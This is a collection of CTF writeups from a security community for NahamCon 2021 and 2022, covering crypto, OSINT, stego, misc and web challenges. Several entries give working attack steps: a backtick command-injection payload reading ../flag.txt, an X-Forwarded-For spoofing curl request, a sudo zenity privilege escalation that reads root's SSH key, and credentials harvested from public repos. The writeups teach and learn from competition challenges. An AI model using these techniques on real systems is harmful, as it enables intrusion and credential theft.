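40 |     predictor.setrandbits(num, 32)  # feed it to the predictor as one 32-bit output
41 |
42 | flag = predictor.getrandbits(32)  # the predictor's guess for the next 32-bit value
43 | r.sendline('3')  # presumably the menu option for submitting a guess
44 | print(r.recvuntil('> '))
45 | r.sendline(str(flag))
46 | print(r.recv(2048))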
47 | ```
48 |
49 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/Treasure.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Treasure Writeup
4 | desc: Check out our writeup for Treasure for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: Treasure
10 | tags: "crypto, cipher"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | * title is `treasure`
18 | * if you search for `treasure` cipher you will land on beale cipher
19 | * and eventually, book cipher
20 |
21 | https://www.dcode.fr/book-cipher
22 |
23 | 
24 |
25 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/chickenwings.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | chicken wings Writeup
4 | desc: Check out our writeup for chicken wings for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: chicken wings
10 | tags: "crypto, cipher"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | WingDing Cipher : https://lingojam.com/WingDing
18 |
19 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/esab64.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | esab64 Writeup
4 | desc: Check out our writeup for esab64 for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: esab64
10 | tags: "crypto"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | It's base64 backwards
18 |
19 | initial string in file: `mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X`
20 |
21 | The challenge name is "base64" spelled backwards, so I reversed the string to:
22 |
23 | `X31lNjFlNzExMTA2YmQwZGIxYjc4ZWZhODk0YjExMjViZntnYWxm`
24 |
25 | base64 decode to: `_}e61e711106bd0db1b78efa894b1125bf{galf`
26 |
27 | reverse the string once again for flag: `flag{fb5211b498afe87b1bd0db601117e16e}_`
28 |
29 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/veebee.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | veebee Writeup
4 | desc: Check out our writeup for veebee for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: veebee
10 | tags: "crypto, vbe, vbs"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Visual Basic scripts can be encoded with Microsoft's Script Encoder, which produces .vbe files. This is obfuscation rather than encryption, so it can be reversed without any key. There are several decoders in the wild; the Python one did not work, but this one does: https://www.interclasse.com/scripts/decovbe.php
18 |
19 | * put the code in a .vbs file
20 | * launch a cmd and execute (the decoder is itself a downloaded script, so read it first or run it in a disposable VM)
21 |
22 | ```
23 | wscript decode.vbs veebee.vbe
24 | ```
25 |
26 | * a dialogue box will open with the flag in it
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2021/forensics/buzz.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | buzz Writeup
4 | desc: Check out our writeup for buzz for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: forensics
9 | challenge: buzz
10 | tags: "forensics"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | ```
18 | $ mv buzz flag.z
19 | $ uncompress flag.z
20 | $ cat flag
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/nahamcon_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Nahamcon 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | ---
--------------------------------------------------------------------------------
/nahamcon_2021/misc.md:
--------------------------------------------------------------------------------
1 | # misc
2 |
3 | ## eighth_circle
4 |
5 | After googling “eight circle of hell cipher” we find something called Malbolge, a programming language.
6 | We ran the challenge text through the online tool below and got the flag:
7 |
8 | https://malbolge.doleczek.pl/
9 |
10 |
11 | ```
12 | flag - flag{bf201f669b8c4adf8b91f09165ec8c5c}
13 | ```
14 |
15 | ----------
16 |
17 | ## Prison Break
18 |
19 | ```
20 | cat /just/out/of/reach/twh.txt -> No such file or directory i.e. real cat error
21 | ```
22 |
23 | but if you try
24 |
25 | ```
26 | cat /just/out/of/reach/flag.txt -> error changes into a custom one
27 | ```
28 |
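29 | The different error message shows that the jail script inspects the command for the keyword `flag` before running it, so the restriction is a keyword filter on the input rather than a limit on what `cat` can read.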
30 |
31 | 
32 |
33 | ----------
34 |
35 | ## Zenith
36 |
37 | * Goal was to privesc to root and get the flag from root directory
38 |
39 | * detecting privesc was easy because all i had to do was `sudo -l`
40 |
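41 | * `sudo -l` shows that we can execute `zenity` with sudo without a password, so zenity runs as root and can open any file root can read; a sudo rule for a program that opens arbitrary files amounts to root read access.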
42 |
43 | * zenity is an application which generates GUI pop ups.
44 |
45 | * zenity needs a display and we only have ssh; a simple workaround is the `-X` command-line option of ssh, which forwards GUI applications (X11) to our machine, so zenity runs on the remote server and its pop-ups appear on our machine.
46 |
47 | * now after reading manpage of zenity few times this command worked
48 |
49 | ```
50 | zenity --text-info --filename "/root/.ssh/id_rsa"
51 | ```
52 |
53 | 
54 |
55 | * and a pop up appears with private key of root <3
56 |
57 | 
58 |
--------------------------------------------------------------------------------
/nahamcon_2021/misc/PrisonBreak.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Prison Break Writeup
4 | desc: Check out our writeup for Prison Break for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: misc
9 | challenge: Prison Break
10 | tags: "misc, jail, escape"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | ```
18 | cat /just/out/of/reach/twh.txt -> No such file or directory i.e. real cat error
19 | ```
20 |
21 | but if you try
22 |
23 | ```
24 | cat /just/out/of/reach/flag.txt -> error changes into a custom one
25 | ```
26 |
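27 | The different error message shows that the jail script inspects the command for the keyword `flag` before running it, so the restriction is a keyword filter on the input rather than a limit on what `cat` can read.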
28 |
29 | 
30 |
31 |
--------------------------------------------------------------------------------
/nahamcon_2021/misc/Zenith.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Zenith Writeup
4 | desc: Check out our writeup for Zenith for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: misc
9 | challenge: Zenith
10 | tags: "misc, privesc, lpe, zenity"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | * Goal was to privesc to root and get the flag from root directory
18 |
19 | * detecting privesc was easy because all i had to do was `sudo -l`
20 |
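21 | * `sudo -l` shows that we can execute `zenity` with sudo without a password, so zenity runs as root and can open any file root can read; a sudo rule for a program that opens arbitrary files amounts to root read access.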
22 |
23 | * zenity is an application which generates GUI pop ups.
24 |
25 | * zenity needs a display and we only have ssh; a simple workaround is the `-X` command-line option of ssh, which forwards GUI applications (X11) to our machine, so zenity runs on the remote server and its pop-ups appear on our machine.
26 |
27 | * now after reading manpage of zenity few times this command worked
28 |
29 | ```
30 | zenity --text-info --filename "/root/.ssh/id_rsa"
31 | ```
32 |
33 | 
34 |
35 | * and a pop up appears with private key of root <3
36 |
37 | 
38 |
--------------------------------------------------------------------------------
/nahamcon_2021/misc/eighthcircle.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | eighth_circle Writeup
4 | desc: Check out our writeup for eighth_circle for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: misc
9 | challenge: eighth_circle
10 | tags: "misc"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | After googling “eight circle of hell cipher” we find something called Malbolge, a programming language.
18 | We ran the challenge text through the online tool below and got the flag:
19 |
20 | https://malbolge.doleczek.pl/
21 |
22 |
23 | ```
24 | flag - flag{bf201f669b8c4adf8b91f09165ec8c5c}
25 | ```
26 |
27 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/Bionic.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Bionic Writeup
4 | desc: Check out our writeup for Bionic for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Bionic
10 | tags: "web"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | flag is in https://constellations.page/robots.txt
18 |
19 | next target url : https://constellations.page/meet-the-team.html
20 |
21 | source page mentions `VELA`, with the following context
22 | ```
23 | Vela, can we please stop sharing our version control software out on the public internet
24 | ```
25 |
26 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/Gus.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Gus Writeup
4 | desc: Check out our writeup for Gus for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Gus
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | https://github.com/gusrodry/development/blob/master/config/.ssh/flag.txt
18 |
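19 | **Along with the Gus flag, the same directory of this public repository also holds an SSH private and public key pair! A private key committed to a public repository has to be treated as compromised.**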
20 |
21 | **in the public key we can see “john@xps15”**
22 |
23 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/Hydraulic.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Hydraulic Writeup
4 | desc: Check out our writeup for Hydraulic for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Hydraulic
10 | tags: "misc"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | This one was straightforward: we don't know the username or the password, so we just had to brute-force the login. This only succeeds because the service accepts password logins and the credentials are weak.
18 |
19 | 
20 |
21 | ssh login and cat flag.txt
22 |
23 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/Leo.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Leo Writeup
4 | desc: Check out our writeup for Leo for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Leo
10 | tags: "web, git"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Directory search on https://constellations.page reveals `/.git/` directory
18 |
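19 | We don't have access to the repository itself because it is not public on GitHub, but the web server serves the `/.git/` directory, so a tool can download its contents and rebuild the repository directly from the website! A deployed site should never expose its `.git` directory.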
20 |
21 | https://github.com/internetwache/GitTools
22 |
23 | then if we check `git log` we can see full name of leo
24 |
25 | 
26 |
27 | Instagram : `@_leorison`
28 |
29 | there is a QR Code in one of the images
30 |
31 | ```
32 | flag{636db5f4f0e36908a4f1a4edc5b0676e}
33 |
34 | A password for Leo is constelleorising
35 | ```
36 |
37 | we found flag and another creds!
38 |
39 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/LyraandOrion.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Lyra and Orion Writeup
4 | desc: Check out our writeup for Lyra and Orion for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Lyra and Orion
10 | tags: "web, git, osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | if we check the “meet the team” commit we can see names of all employees!
18 |
19 | ```
20 | git show 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60
21 | ```
22 |
23 | 
24 |
25 | ```
26 | Orion Morra
27 | Lyra Patte
28 | Gemini Coley
29 | Vela Leray
30 | Pavo Welly
31 | ```
32 |
33 | On twitter we can find Lyra’s profile : https://twitter.com/LyraPatte/with_replies
34 |
35 | and she has linked one of the website links : https://constellations.page/constellations-documents/1/
36 |
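37 | The URL ends in `/1/`, so the documents are numbered sequentially and the ids can simply be guessed; we tried more of them and `/5/` was interesting: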
38 |
39 | 
40 |
41 | Once again on twitter we can find orion at : https://twitter.com/OrionMorra/with_replies
42 |
43 | he has posted two useful pictures
44 |
45 | https://twitter.com/OrionMorra/status/1363789936219082756/
46 |
47 | AND
48 |
49 | https://twitter.com/OrionMorra/status/1370730836736274433/
50 |
51 |
52 | ```
53 | flag{0bcffb17cbcbf4359a42ec45d0ccaf2
54 | ```
55 |
56 | ```
57 | orion:stars4love4life
58 | ```
59 |
60 | another set of creds
61 |
62 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/MeetTheTeam.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Meet The Team Writeup
4 | desc: Check out our writeup for Meet The Team for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: Meet The Team
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | flag is in a tweet on the twitter linked above
18 |
19 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/RECON.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | RECON Writeup
4 | desc: Check out our writeup for RECON for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: RECON
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Github : https://github.com/constellations-git
18 |
19 | Twitter : https://twitter.com/C0NST3LLAT10NS
20 |
21 | there are 0 public repositories but there is one member :
22 |
23 | https://github.com/gusrodry
24 |
25 | in his followers list there is another account related to constellation
26 |
27 | hercules : https://github.com/HerculesScox
28 |
29 | in his account there is one repo created by him which is interesting
30 |
31 | repo : https://github.com/HerculesScox/maintenance
32 |
33 | website mentions “YouTube” and “Podcast” but both are not linked!
34 |
35 | Email for hercules : herculesscoxland@yahoo.com
36 |
37 | https://githubmemory.com/@HerculesScox
38 |
39 |
--------------------------------------------------------------------------------
/nahamcon_2021/mission/hercules.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | hercules Writeup
4 | desc: Check out our writeup for hercules for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: mission
9 | challenge: hercules
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | flag is in “connect.sh” in his repo : https://github.com/HerculesScox/maintenance/blob/main/connect.sh
18 |
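19 | Along with the flag we can also see that he used “sshpass” in this file. sshpass is a program that logs in to SSH automatically by supplying the password on the command line instead of entering it manually every time, which means the password is stored in plain text in the script and, here, published in a public repository.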
20 |
21 | ```
22 | hercules:starstruckherc
23 | ```
24 |
25 | with these credentials we can SSH into DEGRADE challenge!
26 |
27 |
--------------------------------------------------------------------------------
/nahamcon_2021/osint.md:
--------------------------------------------------------------------------------
1 | # OSINT
2 |
3 | ## intigriti Sponsor
4 |
5 | https://app.intigriti.com/researcher/programs/intigriti/nahamcon2021ctf/detail
6 |
7 | found this which has the following:
8 |
9 | 
10 |
11 | the two links do not work so we shall try deciphering this using :
12 |
13 | https://enkhee-osiris.github.io/Decoder-JSFuck/
14 |
15 | but we got an error stating about an illegal character
16 |
17 | https://stackoverflow.com/questions/35657620/illegal-character-error-u200b
18 |
19 | The solution was easy: we opened the challenge text in VSCode, found the invisible `zero width space` character (U+200B) and removed it, after which the decoder worked!
20 |
21 | ----------
22 |
23 | ## INE Sponsor
24 |
25 | Source code analysis on the link provided in the challenge
26 |
27 | 
28 |
29 | ----------
30 |
31 | ## Google Play Sponsor
32 |
33 | Head over to : https://www.google.com/about/appsecurity/play-rewards/
34 |
35 | look for a PDF link under “Theft of Sensitive Data”
36 |
37 | Download : https://www.google.com/about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf
38 |
39 | Search for “flag{” in the PDF: the flag text is invisible on page 17, so it only turns up through a text search!
40 |
41 | 
42 |
--------------------------------------------------------------------------------
/nahamcon_2021/osint/GooglePlaySponsor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Google Play Sponsor Writeup
4 | desc: Check out our writeup for Google Play Sponsor for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: osint
9 | challenge: Google Play Sponsor
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Head over to : https://www.google.com/about/appsecurity/play-rewards/
18 |
19 | look for a PDF link under “Theft of Sensitive Data”
20 |
21 | Download : https://www.google.com/about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf
22 |
23 | Search for “flag{” in the PDF: the flag text is invisible on page 17, so it only turns up through a text search!
24 |
25 | 
26 |
--------------------------------------------------------------------------------
/nahamcon_2021/osint/INESponsor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | INE Sponsor Writeup
4 | desc: Check out our writeup for INE Sponsor for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: osint
9 | challenge: INE Sponsor
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Source code analysis on the link provided in the challenge
18 |
19 | 
20 |
21 |
--------------------------------------------------------------------------------
/nahamcon_2021/osint/intigritiSponsor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | intigriti Sponsor Writeup
4 | desc: Check out our writeup for intigriti Sponsor for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: osint
9 | challenge: intigriti Sponsor
10 | tags: "osint"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | https://app.intigriti.com/researcher/programs/intigriti/nahamcon2021ctf/detail
18 |
19 | found this which has the following:
20 |
21 | 
22 |
23 | the two links do not work so we shall try deciphering this using :
24 |
25 | https://enkhee-osiris.github.io/Decoder-JSFuck/
26 |
27 | but we got an error stating about an illegal character
28 |
29 | https://stackoverflow.com/questions/35657620/illegal-character-error-u200b
30 |
31 | The solution was easy: we opened the challenge text in VSCode, found the invisible `zero width space` character (U+200B) and removed it, after which the decoder worked!
32 |
33 |
--------------------------------------------------------------------------------
/nahamcon_2021/stego.md:
--------------------------------------------------------------------------------
1 | # Steganography
2 |
3 | ## Shoelaces
4 |
5 | Simply running `strings` on the file will get the flag.
6 |
7 | ----------
8 |
9 | ## Pollex
10 |
11 | ```
12 | binwalk --dd='.*' pollex
13 | ```
14 | now in the _pollex.extracted/ there is an image with the flag on it.
15 |
16 |
--------------------------------------------------------------------------------
/nahamcon_2021/stego/Pollex.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Pollex Writeup
4 | desc: Check out our writeup for Pollex for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: stego
9 | challenge: Pollex
10 | tags: "stegano"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | ```
18 | binwalk --dd='.*' pollex
19 | ```
20 | now in the _pollex.extracted/ there is an image with the flag on it.
21 |
22 |
--------------------------------------------------------------------------------
/nahamcon_2021/stego/Shoelaces.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Shoelaces Writeup
4 | desc: Check out our writeup for Shoelaces for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: stego
9 | challenge: Shoelaces
10 | tags: "stegano"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Simply running `strings` on the file will get the flag.
18 |
19 |
--------------------------------------------------------------------------------
/nahamcon_2021/twc_nahamcon_cert.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thewhitecircle/ctf_writeups/28b263d522098954f59d1f075283320cf70d8131/nahamcon_2021/twc_nahamcon_cert.png
--------------------------------------------------------------------------------
/nahamcon_2021/web.md:
--------------------------------------------------------------------------------
1 | # web
2 |
3 | ## $Echo
4 |
5 | It is simple command injection
6 | in the input box we can use ` characters
7 |
8 | ```
9 | `id`
10 | ```
11 |
12 | all commands have to be enclosed in `` chars
13 |
14 | now if we list files using
15 | ```
16 | `ls`
17 | ```
18 | we can see `index.php` when we
19 | ```
20 | `cat index.php`
21 | ```
22 | we can see the code!
23 | certain characters are `blacklisted` and we can only enter a command of less than `15` chars
24 | but there is no `flag.txt` here, if we simply execute
25 | ```
26 | `ls ../`
27 | ```
28 | then we can see flag.txt
29 | ```
30 | `cat ../flag.txt`
31 | ```
32 | fails because length of payload exceeds 15
33 |
34 | payload to get flag :
35 |
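36 | **linux redirection character! `<` is NOT blacklisted!** With it the shell reads the file itself, so no `cat` is needed and the payload stays under the length limit. A character denylist plus a length cap does not make it safe to hand user input to a shell.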
37 | ```
38 | `< ../flag.txt`
39 | ```
40 |
41 | ----------
42 |
43 | ## Homeward Bound
44 |
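45 | In this challenge we were supposed to access internal files by spoofing the client IP address. This can be done with the `X-Forwarded-For` header: the client sets it and can put any value in it, so a server must not base access control on it unless the header comes from a proxy it trusts.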
46 |
47 | ```
48 | $ curl -H "X-Forwarded-For: 127.0.0.1" http://challenge.nahamcon.com:31428/
49 | ```
50 |
--------------------------------------------------------------------------------
/nahamcon_2021/web/Echo.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | $Echo Writeup
4 | desc: Check out our writeup for $Echo for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: web
9 | challenge: $Echo
10 | tags: "web, rce"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | It is simple command injection
18 | in the input box we can use ` characters
19 |
20 | ```
21 | `id`
22 | ```
23 |
24 | all commands have to be enclosed in `` chars
25 |
26 | now if we list files using
27 | ```
28 | `ls`
29 | ```
30 | we can see `index.php` when we
31 | ```
32 | `cat index.php`
33 | ```
34 | we can see the code!
35 | certain characters are `blacklisted` and we can only enter a command of less than `15` chars
36 | but there is no `flag.txt` here, if we simply execute
37 | ```
38 | `ls ../`
39 | ```
40 | then we can see flag.txt
41 | ```
42 | `cat ../flag.txt`
43 | ```
44 | fails because length of payload exceeds 15
45 |
46 | payload to get flag :
47 |
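48 | **linux redirection character! `<` is NOT blacklisted!** With it the shell reads the file itself, so no `cat` is needed and the payload stays under the length limit. A character denylist plus a length cap does not make it safe to hand user input to a shell.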
49 | ```
50 | `< ../flag.txt`
51 | ```
52 |
53 |
--------------------------------------------------------------------------------
/nahamcon_2021/web/HomewardBound.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Homeward Bound Writeup
4 | desc: Check out our writeup for Homeward Bound for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: web
9 | challenge: Homeward Bound
10 | tags: "web"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
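17 | In this challenge we were supposed to access internal files by spoofing the client IP address. This can be done with the `X-Forwarded-For` header: the client sets it and can put any value in it, so a server must not base access control on it unless the header comes from a proxy it trusts.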
18 |
19 | ```
20 | $ curl -H "X-Forwarded-For: 127.0.0.1" http://challenge.nahamcon.com:31428/
21 | ```
22 |
--------------------------------------------------------------------------------
/nahamcon_2022/README.md:
--------------------------------------------------------------------------------
1 | # NahamCon CTF 2022
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Cryptography](crypto.md)
8 | * [Keeber Security](keeber_security.md)
9 | * [Misc](misc.md)
10 | * [Mobile](mobile.md)
11 | * [Pwn](pwn.md)
12 | * [Warmups](warmups.md)
13 | * [Web](web.md)
--------------------------------------------------------------------------------
/nahamcon_2022/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Nahamcon 2022
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | ---
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber1.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 1 Writeup
4 | desc: Check out our writeup for Keeber 1 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 1
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | By searching for keeber security group on google we quickly found a valid domain at keebersecuritygroup.com, then finding the registrant name online gave the flag.
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/nahamcon_2022/keeber_security/Keeber2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Keeber 2 Writeup
4 | desc: Check out our writeup for Keeber 2 for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: keeber_security
9 | challenge: Keeber 2
10 | tags: "osint, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | 
19 |
20 | We can check past versions of most websites in a web archive, and there we find that they fired Tiffany Douglas:
21 |
22 | 
23 |
24 |
